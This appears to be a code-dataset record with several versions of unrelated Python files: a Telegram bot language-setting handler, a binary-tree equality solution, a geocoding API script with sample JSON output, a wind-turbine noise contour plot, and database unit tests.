"step-3": "from pyrogram import Client, filters\nfrom pyrogram.errors import MessageNotModified\nfrom db.models import *\n\n\[email protected]_callback_query(filters.regex('^change_lg_'))\nasync def on_change_language(_, callback):\n settings_id = int(callback.data.split('_')[2])\n with db_session:\n settings = SettingsInstance.get(id=settings_id)\n if not settings or not settings.can_edit(callback.db_user):\n await callback.answer(callback.db_user.get_message('not_admin'),\n show_alert=True)\n return\n await callback.answer()\n await callback.edit_message_text(**languages.create_message_data(\n callback.db_user, settings.chat, settings))\n\n\[email protected]_callback_query(filters.regex('^language_g_'))\nasync def on_language_selected(_, callback):\n data = callback.data.split('_')[2:]\n settings_id = int(data[0])\n language = '_'.join(data[1:])\n with db_session:\n settings = SettingsInstance.get(id=settings_id)\n if not settings or not settings.can_edit(callback.db_user):\n await callback.answer(callback.db_user.get_message('not_admin'),\n show_alert=True)\n return\n settings.chat.language = language\n await callback.answer(settings.chat.get_message('language_selected',\n flag=settings.chat.get_message('flag')), show_alert=True)\n try:\n await callback.edit_message_text(**languages.\n create_message_data(callback.db_user, settings.chat, settings))\n except MessageNotModified:\n pass\n",
"step-4": "from pyrogram import Client, filters\nfrom pyrogram.errors import MessageNotModified\n\nfrom db.models import *\n\n\[email protected]_callback_query(filters.regex('^change_lg_'))\nasync def on_change_language(_, callback):\n settings_id = int(callback.data.split('_')[2])\n\n with db_session:\n settings = SettingsInstance.get(id=settings_id)\n\n if not settings or not settings.can_edit(callback.db_user):\n await callback.answer(callback.db_user.get_message('not_admin'), show_alert=True)\n return\n\n await callback.answer()\n await callback.edit_message_text(**languages.create_message_data(callback.db_user, settings.chat, settings))\n\n\[email protected]_callback_query(filters.regex('^language_g_'))\nasync def on_language_selected(_, callback):\n data = callback.data.split('_')[2:]\n settings_id = int(data[0])\n language = '_'.join(data[1:])\n\n with db_session:\n settings = SettingsInstance.get(id=settings_id)\n\n if not settings or not settings.can_edit(callback.db_user):\n await callback.answer(callback.db_user.get_message('not_admin'), show_alert=True)\n return\n\n settings.chat.language = language\n await callback.answer(settings.chat.get_message('language_selected', flag=settings.chat.get_message('flag')),\n show_alert=True)\n\n try:\n await callback.edit_message_text(**languages.create_message_data(callback.db_user, settings.chat, settings))\n except MessageNotModified: # If the user selects the same language he already had\n pass\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class Solution:
def solution(self, rootA, rootB):
if rootA == rootB:
print('h')
return True
if rootA is None or rootB is None:
return False
return rootA.val == rootB.val and self.solution(rootA.left, rootB.left
) and self.solution(rootA.right, rootB.right)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
def solution(self, rootA, rootB):
if rootA == rootB:
print('h')
return True
if rootA is None or rootB is None:
return False
return rootA.val == rootB.val and self.solution(rootA.left, rootB.left
) and self.solution(rootA.right, rootB.right)
<|reserved_special_token_0|>
A.insert(100)
A.insert(102)
A.insert(96)
<|reserved_special_token_0|>
B.insert(100)
B.insert(102)
B.insert(96)
<|reserved_special_token_0|>
print(res)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
def solution(self, rootA, rootB):
if rootA == rootB:
print('h')
return True
if rootA is None or rootB is None:
return False
return rootA.val == rootB.val and self.solution(rootA.left, rootB.left
) and self.solution(rootA.right, rootB.right)
A = BinaryTree()
A.insert(100)
A.insert(102)
A.insert(96)
B = BinaryTree()
B.insert(100)
B.insert(102)
B.insert(96)
res = Solution().solution(A.root, B.root)
print(res)
<|reserved_special_token_1|>
from Level6.Trees.BinaryTree import BinaryTree
class Solution:
def solution(self, rootA, rootB):
if rootA == rootB:
print('h')
return True
if rootA is None or rootB is None:
return False
return rootA.val == rootB.val and self.solution(rootA.left, rootB.left
) and self.solution(rootA.right, rootB.right)
A = BinaryTree()
A.insert(100)
A.insert(102)
A.insert(96)
B = BinaryTree()
B.insert(100)
B.insert(102)
B.insert(96)
res = Solution().solution(A.root, B.root)
print(res)
<|reserved_special_token_1|>
# Given two binary trees, write a function to check if they are equal or not.
#
# Two binary trees are considered equal if they are structurally identical and the nodes have the same value.
#
# Return 0 / 1 ( 0 for false, 1 for true ) for this problem
#
# Example :
#
# Input :
#
# 1 1
# / \ / \
# 2 3 2 3
#
# Output :
# 1 or True
from Level6.Trees.BinaryTree import BinaryTree
class Solution:
def solution(self, rootA, rootB):
if rootA == rootB:
print('h')
return True
if rootA is None or rootB is None:
return False
# if rootA is None and rootB is None:
# return True
return ((rootA.val == rootB.val) and self.solution(rootA.left, rootB.left) and
self.solution(rootA.right, rootB.right))
A = BinaryTree()
A.insert(100)
A.insert(102)
A.insert(96)
B = BinaryTree()
B.insert(100)
B.insert(102)
B.insert(96)
res = Solution().solution(A.root, B.root)
print(res)
|
flexible
|
{
"blob_id": "4a0eca90de3ce7fb0ab6decb0ec6aadb32c1a9fa",
"index": 601,
"step-1": "<mask token>\n\n\nclass Solution:\n\n def solution(self, rootA, rootB):\n if rootA == rootB:\n print('h')\n return True\n if rootA is None or rootB is None:\n return False\n return rootA.val == rootB.val and self.solution(rootA.left, rootB.left\n ) and self.solution(rootA.right, rootB.right)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n\n def solution(self, rootA, rootB):\n if rootA == rootB:\n print('h')\n return True\n if rootA is None or rootB is None:\n return False\n return rootA.val == rootB.val and self.solution(rootA.left, rootB.left\n ) and self.solution(rootA.right, rootB.right)\n\n\n<mask token>\nA.insert(100)\nA.insert(102)\nA.insert(96)\n<mask token>\nB.insert(100)\nB.insert(102)\nB.insert(96)\n<mask token>\nprint(res)\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def solution(self, rootA, rootB):\n if rootA == rootB:\n print('h')\n return True\n if rootA is None or rootB is None:\n return False\n return rootA.val == rootB.val and self.solution(rootA.left, rootB.left\n ) and self.solution(rootA.right, rootB.right)\n\n\nA = BinaryTree()\nA.insert(100)\nA.insert(102)\nA.insert(96)\nB = BinaryTree()\nB.insert(100)\nB.insert(102)\nB.insert(96)\nres = Solution().solution(A.root, B.root)\nprint(res)\n",
"step-4": "from Level6.Trees.BinaryTree import BinaryTree\n\n\nclass Solution:\n\n def solution(self, rootA, rootB):\n if rootA == rootB:\n print('h')\n return True\n if rootA is None or rootB is None:\n return False\n return rootA.val == rootB.val and self.solution(rootA.left, rootB.left\n ) and self.solution(rootA.right, rootB.right)\n\n\nA = BinaryTree()\nA.insert(100)\nA.insert(102)\nA.insert(96)\nB = BinaryTree()\nB.insert(100)\nB.insert(102)\nB.insert(96)\nres = Solution().solution(A.root, B.root)\nprint(res)\n",
"step-5": "# Given two binary trees, write a function to check if they are equal or not.\n#\n# Two binary trees are considered equal if they are structurally identical and the nodes have the same value.\n#\n# Return 0 / 1 ( 0 for false, 1 for true ) for this problem\n#\n# Example :\n#\n# Input :\n#\n# 1 1\n# / \\ / \\\n# 2 3 2 3\n#\n# Output :\n# 1 or True\n\n\nfrom Level6.Trees.BinaryTree import BinaryTree\n\n\nclass Solution:\n\n def solution(self, rootA, rootB):\n\n if rootA == rootB:\n print('h')\n return True\n\n if rootA is None or rootB is None:\n return False\n\n # if rootA is None and rootB is None:\n # return True\n\n return ((rootA.val == rootB.val) and self.solution(rootA.left, rootB.left) and\n self.solution(rootA.right, rootB.right))\n\n\nA = BinaryTree()\nA.insert(100)\nA.insert(102)\nA.insert(96)\nB = BinaryTree()\nB.insert(100)\nB.insert(102)\nB.insert(96)\nres = Solution().solution(A.root, B.root)\nprint(res)\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
#API End Points by Mitul
import urllib.error, urllib.request, urllib.parse
import json
target = 'http://py4e-data.dr-chuck.net/json?'
local = input('Enter location: ')
url = target + urllib.parse.urlencode({'address': local, 'key' : 42})
print('Retriving', url)
data = urllib.request.urlopen(url).read()
print('Retrived', len(data), 'characters')
js = json.loads(data)
print(json.dumps(js, indent = 4))
print('Place id', js['results'][0]['place_id'])
'''Output:
Enter location: >? UIUC
Retriving http://py4e-data.dr-chuck.net/json?address=UIUC&key=42
Retrived 1720 characters
{
"results": [
{
"access_points": [],
"address_components": [
{
"long_name": "Champaign",
"short_name": "Champaign",
"types": [
"locality",
"political"
]
},
{
"long_name": "Champaign County",
"short_name": "Champaign County",
"types": [
"administrative_area_level_2",
"political"
]
},
{
"long_name": "Illinois",
"short_name": "IL",
"types": [
"administrative_area_level_1",
"political"
]
},
{
"long_name": "United States",
"short_name": "US",
"types": [
"country",
"political"
]
}
],
"formatted_address": "Champaign, IL, USA",
"geometry": {
"location": {
"lat": 40.1019523,
"lng": -88.2271615
},
"location_type": "GEOMETRIC_CENTER",
"viewport": {
"northeast": {
"lat": 40.1033012802915,
"lng": -88.22581251970848
},
"southwest": {
"lat": 40.1006033197085,
"lng": -88.2285104802915
}
}
},
"place_id": "ChIJ6VUmqSTXDIgR-iZoBCUFPKU",
"plus_code": {
"compound_code": "4Q2F+Q4 Champaign, Champaign City Township, IL, United States",
"global_code": "86GH4Q2F+Q4"
},
"types": [
"establishment",
"point_of_interest",
"university"
]
}
],
"status": "OK"
}
Place id ChIJ6VUmqSTXDIgR-iZoBCUFPKU
'''
|
normal
|
{
"blob_id": "d34159536e860719094a36cfc30ffb5fcae72a9a",
"index": 296,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint('Retriving', url)\n<mask token>\nprint('Retrived', len(data), 'characters')\n<mask token>\nprint(json.dumps(js, indent=4))\nprint('Place id', js['results'][0]['place_id'])\n<mask token>\n",
"step-3": "<mask token>\ntarget = 'http://py4e-data.dr-chuck.net/json?'\nlocal = input('Enter location: ')\nurl = target + urllib.parse.urlencode({'address': local, 'key': 42})\nprint('Retriving', url)\ndata = urllib.request.urlopen(url).read()\nprint('Retrived', len(data), 'characters')\njs = json.loads(data)\nprint(json.dumps(js, indent=4))\nprint('Place id', js['results'][0]['place_id'])\n<mask token>\n",
"step-4": "import urllib.error, urllib.request, urllib.parse\nimport json\ntarget = 'http://py4e-data.dr-chuck.net/json?'\nlocal = input('Enter location: ')\nurl = target + urllib.parse.urlencode({'address': local, 'key': 42})\nprint('Retriving', url)\ndata = urllib.request.urlopen(url).read()\nprint('Retrived', len(data), 'characters')\njs = json.loads(data)\nprint(json.dumps(js, indent=4))\nprint('Place id', js['results'][0]['place_id'])\n<mask token>\n",
"step-5": "#API End Points by Mitul\nimport urllib.error, urllib.request, urllib.parse\nimport json\n\ntarget = 'http://py4e-data.dr-chuck.net/json?'\nlocal = input('Enter location: ')\nurl = target + urllib.parse.urlencode({'address': local, 'key' : 42})\n\nprint('Retriving', url)\ndata = urllib.request.urlopen(url).read()\nprint('Retrived', len(data), 'characters')\njs = json.loads(data)\nprint(json.dumps(js, indent = 4))\nprint('Place id', js['results'][0]['place_id'])\n\n\n'''Output:\nEnter location: >? UIUC\nRetriving http://py4e-data.dr-chuck.net/json?address=UIUC&key=42\nRetrived 1720 characters\n{\n \"results\": [\n {\n \"access_points\": [],\n \"address_components\": [\n {\n \"long_name\": \"Champaign\",\n \"short_name\": \"Champaign\",\n \"types\": [\n \"locality\",\n \"political\"\n ]\n },\n {\n \"long_name\": \"Champaign County\",\n \"short_name\": \"Champaign County\",\n \"types\": [\n \"administrative_area_level_2\",\n \"political\"\n ]\n },\n {\n \"long_name\": \"Illinois\",\n \"short_name\": \"IL\",\n \"types\": [\n \"administrative_area_level_1\",\n \"political\"\n ]\n },\n {\n \"long_name\": \"United States\",\n \"short_name\": \"US\",\n \"types\": [\n \"country\",\n \"political\"\n ]\n }\n ],\n \"formatted_address\": \"Champaign, IL, USA\",\n \"geometry\": {\n \"location\": {\n \"lat\": 40.1019523,\n \"lng\": -88.2271615\n },\n \"location_type\": \"GEOMETRIC_CENTER\",\n \"viewport\": {\n \"northeast\": {\n \"lat\": 40.1033012802915,\n \"lng\": -88.22581251970848\n },\n \"southwest\": {\n \"lat\": 40.1006033197085,\n \"lng\": -88.2285104802915\n }\n }\n },\n \"place_id\": \"ChIJ6VUmqSTXDIgR-iZoBCUFPKU\",\n \"plus_code\": {\n \"compound_code\": \"4Q2F+Q4 Champaign, Champaign City Township, IL, United States\",\n \"global_code\": \"86GH4Q2F+Q4\"\n },\n \"types\": [\n \"establishment\",\n \"point_of_interest\",\n \"university\"\n ]\n }\n ],\n \"status\": \"OK\"\n}\nPlace id ChIJ6VUmqSTXDIgR-iZoBCUFPKU\n'''\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
"""
Created on Tue Apr 25 13:34:46 2017
@author: Sven Geboers
"""
from math import pi,e
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import cm
def LevelToIntensity(NoiseLevelIndB):
I0 = 10.**(-12) #This is the treshold hearing intensity, matching 0 dB
NoiseLevel = float(NoiseLevelIndB)
Intensity = I0*10**(NoiseLevel/10)
return Intensity
def IntensityToLevel(Intensity):
I0 = 10.**(-12) #This is the treshold hearing intensity, matching 0 dB
Intensity = Intensity
NoiseLevelIndB = 10*np.log10(Intensity/I0)
return NoiseLevelIndB
#Definine the mathematical function coth(x)
coth = lambda x: (e**(x)-e**(-x))/(e**(x)-e**(-x)) #np.cosh(x)/np.sinh(x)
#Closes all previous plots so that we don't have to click them away manually
plt.close('all')
#Defining some constants:
SLHighway10 = 53.5 #dB, this is the sound level of a highway at 10 m distance
d1 = 10. #m, distance between the highway and the sound barrier
#Creating data mesh
b = np.arange(0.1, 150, 0.5)
d = np.arange(0.1, 150, 0.5)
b, d = np.meshgrid(b, d)
#Calculating maximum velocity and individual sound power
Vmax = 9.25 #m/s
IntensityTurbine40cm = lambda V: 4*10**(-6)*e**(0.2216*V)
IntensityIndividualTurbine = IntensityTurbine40cm(Vmax)
PowerIndividual = IntensityIndividualTurbine*pi*0.16 * 4
SoundPowerHighway = LevelToIntensity(SLHighway10)*pi*d1**2 * 4
#Calculating intensity and sound level
Intensity = PowerIndividual/(4*b*d)*coth(d/b*pi)+SoundPowerHighway/(4*pi*(d+d1)**2)
SL = IntensityToLevel(Intensity)
#Plots contour curve
levels = [41.,47.] #Contour levels that will be shown
fig = plt.figure()
CS = plt.contourf(d, b, SL, levels,cmap=cm.Greys)
cbar=plt.colorbar()
cbar.set_label('Sound level in dB', rotation=270)
plt.xlabel('Distance (m)')
plt.ylabel('Spacing (m)')
plt.title('Sound level in function of distance and spacing \n with a velocity of 9.25 m/s for WM6',fontweight='bold')
plt.minorticks_on()
plt.grid(b=True, which='major',linewidth=2)
plt.grid(b=True, which='minor')
plt.show()
|
normal
|
{
"blob_id": "68a1d5a77abd19aece04bd560df121ceddccea42",
"index": 3179,
"step-1": "<mask token>\n\n\ndef LevelToIntensity(NoiseLevelIndB):\n I0 = 10.0 ** -12\n NoiseLevel = float(NoiseLevelIndB)\n Intensity = I0 * 10 ** (NoiseLevel / 10)\n return Intensity\n\n\ndef IntensityToLevel(Intensity):\n I0 = 10.0 ** -12\n Intensity = Intensity\n NoiseLevelIndB = 10 * np.log10(Intensity / I0)\n return NoiseLevelIndB\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef LevelToIntensity(NoiseLevelIndB):\n I0 = 10.0 ** -12\n NoiseLevel = float(NoiseLevelIndB)\n Intensity = I0 * 10 ** (NoiseLevel / 10)\n return Intensity\n\n\ndef IntensityToLevel(Intensity):\n I0 = 10.0 ** -12\n Intensity = Intensity\n NoiseLevelIndB = 10 * np.log10(Intensity / I0)\n return NoiseLevelIndB\n\n\n<mask token>\nplt.close('all')\n<mask token>\ncbar.set_label('Sound level in dB', rotation=270)\nplt.xlabel('Distance (m)')\nplt.ylabel('Spacing (m)')\nplt.title(\n \"\"\"Sound level in function of distance and spacing \n with a velocity of 9.25 m/s for WM6\"\"\"\n , fontweight='bold')\nplt.minorticks_on()\nplt.grid(b=True, which='major', linewidth=2)\nplt.grid(b=True, which='minor')\nplt.show()\n",
"step-3": "<mask token>\n\n\ndef LevelToIntensity(NoiseLevelIndB):\n I0 = 10.0 ** -12\n NoiseLevel = float(NoiseLevelIndB)\n Intensity = I0 * 10 ** (NoiseLevel / 10)\n return Intensity\n\n\ndef IntensityToLevel(Intensity):\n I0 = 10.0 ** -12\n Intensity = Intensity\n NoiseLevelIndB = 10 * np.log10(Intensity / I0)\n return NoiseLevelIndB\n\n\ncoth = lambda x: (e ** x - e ** -x) / (e ** x - e ** -x)\nplt.close('all')\nSLHighway10 = 53.5\nd1 = 10.0\nb = np.arange(0.1, 150, 0.5)\nd = np.arange(0.1, 150, 0.5)\nb, d = np.meshgrid(b, d)\nVmax = 9.25\nIntensityTurbine40cm = lambda V: 4 * 10 ** -6 * e ** (0.2216 * V)\nIntensityIndividualTurbine = IntensityTurbine40cm(Vmax)\nPowerIndividual = IntensityIndividualTurbine * pi * 0.16 * 4\nSoundPowerHighway = LevelToIntensity(SLHighway10) * pi * d1 ** 2 * 4\nIntensity = PowerIndividual / (4 * b * d) * coth(d / b * pi\n ) + SoundPowerHighway / (4 * pi * (d + d1) ** 2)\nSL = IntensityToLevel(Intensity)\nlevels = [41.0, 47.0]\nfig = plt.figure()\nCS = plt.contourf(d, b, SL, levels, cmap=cm.Greys)\ncbar = plt.colorbar()\ncbar.set_label('Sound level in dB', rotation=270)\nplt.xlabel('Distance (m)')\nplt.ylabel('Spacing (m)')\nplt.title(\n \"\"\"Sound level in function of distance and spacing \n with a velocity of 9.25 m/s for WM6\"\"\"\n , fontweight='bold')\nplt.minorticks_on()\nplt.grid(b=True, which='major', linewidth=2)\nplt.grid(b=True, which='minor')\nplt.show()\n",
"step-4": "<mask token>\nfrom math import pi, e\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\n\n\ndef LevelToIntensity(NoiseLevelIndB):\n I0 = 10.0 ** -12\n NoiseLevel = float(NoiseLevelIndB)\n Intensity = I0 * 10 ** (NoiseLevel / 10)\n return Intensity\n\n\ndef IntensityToLevel(Intensity):\n I0 = 10.0 ** -12\n Intensity = Intensity\n NoiseLevelIndB = 10 * np.log10(Intensity / I0)\n return NoiseLevelIndB\n\n\ncoth = lambda x: (e ** x - e ** -x) / (e ** x - e ** -x)\nplt.close('all')\nSLHighway10 = 53.5\nd1 = 10.0\nb = np.arange(0.1, 150, 0.5)\nd = np.arange(0.1, 150, 0.5)\nb, d = np.meshgrid(b, d)\nVmax = 9.25\nIntensityTurbine40cm = lambda V: 4 * 10 ** -6 * e ** (0.2216 * V)\nIntensityIndividualTurbine = IntensityTurbine40cm(Vmax)\nPowerIndividual = IntensityIndividualTurbine * pi * 0.16 * 4\nSoundPowerHighway = LevelToIntensity(SLHighway10) * pi * d1 ** 2 * 4\nIntensity = PowerIndividual / (4 * b * d) * coth(d / b * pi\n ) + SoundPowerHighway / (4 * pi * (d + d1) ** 2)\nSL = IntensityToLevel(Intensity)\nlevels = [41.0, 47.0]\nfig = plt.figure()\nCS = plt.contourf(d, b, SL, levels, cmap=cm.Greys)\ncbar = plt.colorbar()\ncbar.set_label('Sound level in dB', rotation=270)\nplt.xlabel('Distance (m)')\nplt.ylabel('Spacing (m)')\nplt.title(\n \"\"\"Sound level in function of distance and spacing \n with a velocity of 9.25 m/s for WM6\"\"\"\n , fontweight='bold')\nplt.minorticks_on()\nplt.grid(b=True, which='major', linewidth=2)\nplt.grid(b=True, which='minor')\nplt.show()\n",
"step-5": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 25 13:34:46 2017\r\n\r\n@author: Sven Geboers\r\n\"\"\"\r\n\r\nfrom math import pi,e\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import cm\r\n\r\ndef LevelToIntensity(NoiseLevelIndB):\r\n I0 = 10.**(-12) #This is the treshold hearing intensity, matching 0 dB\r\n NoiseLevel = float(NoiseLevelIndB)\r\n Intensity = I0*10**(NoiseLevel/10)\r\n return Intensity\r\n \r\ndef IntensityToLevel(Intensity):\r\n I0 = 10.**(-12) #This is the treshold hearing intensity, matching 0 dB\r\n Intensity = Intensity\r\n NoiseLevelIndB = 10*np.log10(Intensity/I0)\r\n return NoiseLevelIndB\r\n \r\n#Definine the mathematical function coth(x)\r\ncoth = lambda x: (e**(x)-e**(-x))/(e**(x)-e**(-x)) #np.cosh(x)/np.sinh(x)\r\n\r\n#Closes all previous plots so that we don't have to click them away manually\r\nplt.close('all')\r\n\r\n#Defining some constants:\r\nSLHighway10 = 53.5 #dB, this is the sound level of a highway at 10 m distance\r\nd1 = 10. #m, distance between the highway and the sound barrier\r\n\r\n#Creating data mesh \r\nb = np.arange(0.1, 150, 0.5)\r\nd = np.arange(0.1, 150, 0.5)\r\nb, d = np.meshgrid(b, d)\r\n\r\n#Calculating maximum velocity and individual sound power\r\nVmax = 9.25 #m/s\r\nIntensityTurbine40cm = lambda V: 4*10**(-6)*e**(0.2216*V)\r\nIntensityIndividualTurbine = IntensityTurbine40cm(Vmax)\r\nPowerIndividual = IntensityIndividualTurbine*pi*0.16 * 4\r\nSoundPowerHighway = LevelToIntensity(SLHighway10)*pi*d1**2 * 4\r\n\r\n#Calculating intensity and sound level\r\nIntensity = PowerIndividual/(4*b*d)*coth(d/b*pi)+SoundPowerHighway/(4*pi*(d+d1)**2)\r\nSL = IntensityToLevel(Intensity)\r\n\r\n#Plots contour curve \r\nlevels = [41.,47.] #Contour levels that will be shown\r\nfig = plt.figure()\r\nCS = plt.contourf(d, b, SL, levels,cmap=cm.Greys)\r\ncbar=plt.colorbar()\r\ncbar.set_label('Sound level in dB', rotation=270)\r\nplt.xlabel('Distance (m)')\r\nplt.ylabel('Spacing (m)')\r\nplt.title('Sound level in function of distance and spacing \\n with a velocity of 9.25 m/s for WM6',fontweight='bold')\r\nplt.minorticks_on()\r\nplt.grid(b=True, which='major',linewidth=2)\r\nplt.grid(b=True, which='minor') \r\nplt.show()\r\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
urlpatterns = [url('^class/([^/]+)/?$', views.puppet_class, name=
'puppet-class'), url('^edit-host/(?P<fqdn>[^/]+)?/?$', views.edit_host,
name='edit-host'), url('^add-host/(?P<fqdn>[^/]+)?/?$', views.add_host,
name='add-host'), url('^delete/([^/]+)/?$', views.delete_host, name=
'delete-host'), url('^user/(?P<loginid>[^/]+)/?$', views.edit_user,
name='edit-user'), url('^', views.index, name='index')]
<|reserved_special_token_1|>
from django.conf.urls import url
from . import views
urlpatterns = [url('^class/([^/]+)/?$', views.puppet_class, name=
'puppet-class'), url('^edit-host/(?P<fqdn>[^/]+)?/?$', views.edit_host,
name='edit-host'), url('^add-host/(?P<fqdn>[^/]+)?/?$', views.add_host,
name='add-host'), url('^delete/([^/]+)/?$', views.delete_host, name=
'delete-host'), url('^user/(?P<loginid>[^/]+)/?$', views.edit_user,
name='edit-user'), url('^', views.index, name='index')]
<|reserved_special_token_1|>
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^class/([^/]+)/?$', views.puppet_class, name='puppet-class'),
url(r'^edit-host/(?P<fqdn>[^/]+)?/?$', views.edit_host, name='edit-host'),
url(r'^add-host/(?P<fqdn>[^/]+)?/?$', views.add_host, name='add-host'),
url(r'^delete/([^/]+)/?$', views.delete_host, name='delete-host'),
url(r'^user/(?P<loginid>[^/]+)/?$', views.edit_user, name='edit-user'),
# url(r'^add-host', views.add_host, name='add-host'),
url(r'^', views.index, name='index'),
]
|
flexible
|
{
"blob_id": "add56d52f3c88f814a166d12c3bc5a5906268864",
"index": 484,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [url('^class/([^/]+)/?$', views.puppet_class, name=\n 'puppet-class'), url('^edit-host/(?P<fqdn>[^/]+)?/?$', views.edit_host,\n name='edit-host'), url('^add-host/(?P<fqdn>[^/]+)?/?$', views.add_host,\n name='add-host'), url('^delete/([^/]+)/?$', views.delete_host, name=\n 'delete-host'), url('^user/(?P<loginid>[^/]+)/?$', views.edit_user,\n name='edit-user'), url('^', views.index, name='index')]\n",
"step-3": "from django.conf.urls import url\nfrom . import views\nurlpatterns = [url('^class/([^/]+)/?$', views.puppet_class, name=\n 'puppet-class'), url('^edit-host/(?P<fqdn>[^/]+)?/?$', views.edit_host,\n name='edit-host'), url('^add-host/(?P<fqdn>[^/]+)?/?$', views.add_host,\n name='add-host'), url('^delete/([^/]+)/?$', views.delete_host, name=\n 'delete-host'), url('^user/(?P<loginid>[^/]+)/?$', views.edit_user,\n name='edit-user'), url('^', views.index, name='index')]\n",
"step-4": "from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^class/([^/]+)/?$', views.puppet_class, name='puppet-class'),\n url(r'^edit-host/(?P<fqdn>[^/]+)?/?$', views.edit_host, name='edit-host'),\n url(r'^add-host/(?P<fqdn>[^/]+)?/?$', views.add_host, name='add-host'),\n url(r'^delete/([^/]+)/?$', views.delete_host, name='delete-host'),\n url(r'^user/(?P<loginid>[^/]+)/?$', views.edit_user, name='edit-user'),\n # url(r'^add-host', views.add_host, name='add-host'),\n url(r'^', views.index, name='index'),\n]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# Reference: https://docs.python.org/2/library/unittest.html
import unittest
import sys
sys.path.append('..')
from database_utils import DatabaseUtils
class Test_DatabaseUtils(unittest.TestCase):
def setUp(self):
self.db=DatabaseUtils()
def dataCount(self):
with self.db.connection.cursor() as cursor:
cursor.execute("select count(*) from LmsUser")
return cursor.fetchone()[0]
def test_getUser(self):
count = self.dataCount()
try:
trueResult=self.db.getUser("username")
print("Test passed")
except:
print("Test failed")
def test_insertBookTransaction(self):
testData=(1,1,"2019-01-01","abc")
result=self.db.insertBookTransaction(testData[0],testData[1],testData[2],testData[3])
print("result: ",result)
self.assertTrue(result)
def test_updateBookStatus(self):
testData=(1,"anything")
result=self.db.updateBookStatus(testData[1],testData[0])
self.assertFalse(result)
def test_updateBookTransaction(self):
testData=(1,"anything","2019-01-01")
result=self.db.updateBookTransaction(testData[0],testData[1],testData[2])
self.assertFalse(result)
def test_searchBooks(self):
result=self.db.searchBooks("abc")
self.assertFalse(result)
result=self.db.searchBooks("Harry")
self.assertTrue(result)
def test_searchBooksAuthur(self):
result=self.db.searchBooksAuthur("abc")
self.assertFalse(result)
result=self.db.searchBooksAuthur("gavin")
self.assertTrue(result)
def test_searchBooksISBN(self):
result=self.db.searchBooksISBN(1)
self.assertFalse(result)
def test_listBooks(self):
result=self.db.listBooks()
self.assertTrue(result)
def test_getBook(self):
result=self.db.getBook(1)
self.assertTrue(result)
def test_getBookISBN(self):
result=self.db.getBookISBN(1)
self.assertFalse(result)
def test_listReturnBooks(self):
result=self.db.listReturnBooks(1)
self.assertTrue(result)
def test_getReturnBook(self):
result=self.db.getReturnBook(1,1)
self.assertTrue(result)
if __name__ == "__main__":
unittest.main()
|
normal
|
{
"blob_id": "ff8e8af72a8eb97a392fcfec5960eed7a2e51f68",
"index": 9211,
"step-1": "<mask token>\n\n\nclass Test_DatabaseUtils(unittest.TestCase):\n\n def setUp(self):\n self.db = DatabaseUtils()\n <mask token>\n\n def test_getUser(self):\n count = self.dataCount()\n try:\n trueResult = self.db.getUser('username')\n print('Test passed')\n except:\n print('Test failed')\n <mask token>\n <mask token>\n\n def test_updateBookTransaction(self):\n testData = 1, 'anything', '2019-01-01'\n result = self.db.updateBookTransaction(testData[0], testData[1],\n testData[2])\n self.assertFalse(result)\n <mask token>\n\n def test_searchBooksAuthur(self):\n result = self.db.searchBooksAuthur('abc')\n self.assertFalse(result)\n result = self.db.searchBooksAuthur('gavin')\n self.assertTrue(result)\n\n def test_searchBooksISBN(self):\n result = self.db.searchBooksISBN(1)\n self.assertFalse(result)\n <mask token>\n\n def test_getBook(self):\n result = self.db.getBook(1)\n self.assertTrue(result)\n\n def test_getBookISBN(self):\n result = self.db.getBookISBN(1)\n self.assertFalse(result)\n <mask token>\n\n def test_getReturnBook(self):\n result = self.db.getReturnBook(1, 1)\n self.assertTrue(result)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Test_DatabaseUtils(unittest.TestCase):\n\n def setUp(self):\n self.db = DatabaseUtils()\n <mask token>\n\n def test_getUser(self):\n count = self.dataCount()\n try:\n trueResult = self.db.getUser('username')\n print('Test passed')\n except:\n print('Test failed')\n <mask token>\n <mask token>\n\n def test_updateBookTransaction(self):\n testData = 1, 'anything', '2019-01-01'\n result = self.db.updateBookTransaction(testData[0], testData[1],\n testData[2])\n self.assertFalse(result)\n <mask token>\n\n def test_searchBooksAuthur(self):\n result = self.db.searchBooksAuthur('abc')\n self.assertFalse(result)\n result = self.db.searchBooksAuthur('gavin')\n self.assertTrue(result)\n\n def test_searchBooksISBN(self):\n result = self.db.searchBooksISBN(1)\n self.assertFalse(result)\n\n def test_listBooks(self):\n result = self.db.listBooks()\n self.assertTrue(result)\n\n def test_getBook(self):\n result = self.db.getBook(1)\n self.assertTrue(result)\n\n def test_getBookISBN(self):\n result = self.db.getBookISBN(1)\n self.assertFalse(result)\n <mask token>\n\n def test_getReturnBook(self):\n result = self.db.getReturnBook(1, 1)\n self.assertTrue(result)\n\n\n<mask token>\n",
